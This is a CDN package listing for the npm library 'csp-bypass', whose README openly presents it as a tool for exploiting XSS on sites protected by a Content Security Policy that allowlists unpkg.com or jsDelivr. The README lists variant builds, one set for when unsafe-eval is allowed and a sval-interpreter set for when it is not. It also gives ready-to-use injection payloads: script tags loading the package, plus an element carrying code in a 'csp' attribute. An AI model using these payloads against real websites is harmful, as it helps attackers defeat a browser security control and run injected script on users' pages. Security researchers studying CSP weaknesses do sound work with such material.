csp-bypass

CanardMandarin
js
csp-bypass JS library on GitHub csp-bypass JS library on npm Download csp-bypass JS library

Need any help bypassing CSP ?

Version 1.0.2 License SEE LICENSE IN LICENSE Vulnerabilities 0
csp-bypass has no homepage
csp-bypass JS library on GitHub
csp-bypass JS library on npm
Download csp-bypass JS library
Keywords
CSPbypassXSSinjectioncanardcanardmandarin
INSTALL
Type:
Version:
<script src=" https://cdn.jsdelivr.net/npm/csp-bypass@1.0.2/dist/sval-classic.min.js "></script>
No default JS file set by the package author so the URL is guessed. You can always browse all package files to use another one.
Readme Files Statistics Browse CDN

easy-csp-bypass

Just a fun project to see if this code can end up in some CDN, so it would be easier to exploit XSS with CSP.

How to use ?

Well, it depends. If you are lucky enough to find unsafe-eval in the CSP configuration, you can use those scenario:

  • Classic => /dist/classic.js
  • Classic-infinite => /dist/classic-infinite.js
  • Url => /dist/url.js

If you can't use eval() because unsafe-eval is not in the configuration, well it's not over !! I found a Javascript interpreter called sval. It can easily bypass the unsafe-eval restriction :) !

  • Classic => /dist/sval-classic.js
  • Classic-infinite => /dist/sval-infinite.js
  • Url => /dist/sval-url.js

Example

If you have an XSS on a website with CSP, search in the directive 'script-src' for unpkg.com or jsdeliver. If these domain are whitelist, you win !

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
  <br csp="alert(1)">

if 'unsafe-eval' is missing use the sval one:

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/sval-classic.js"></script>
  <br csp="alert(1)">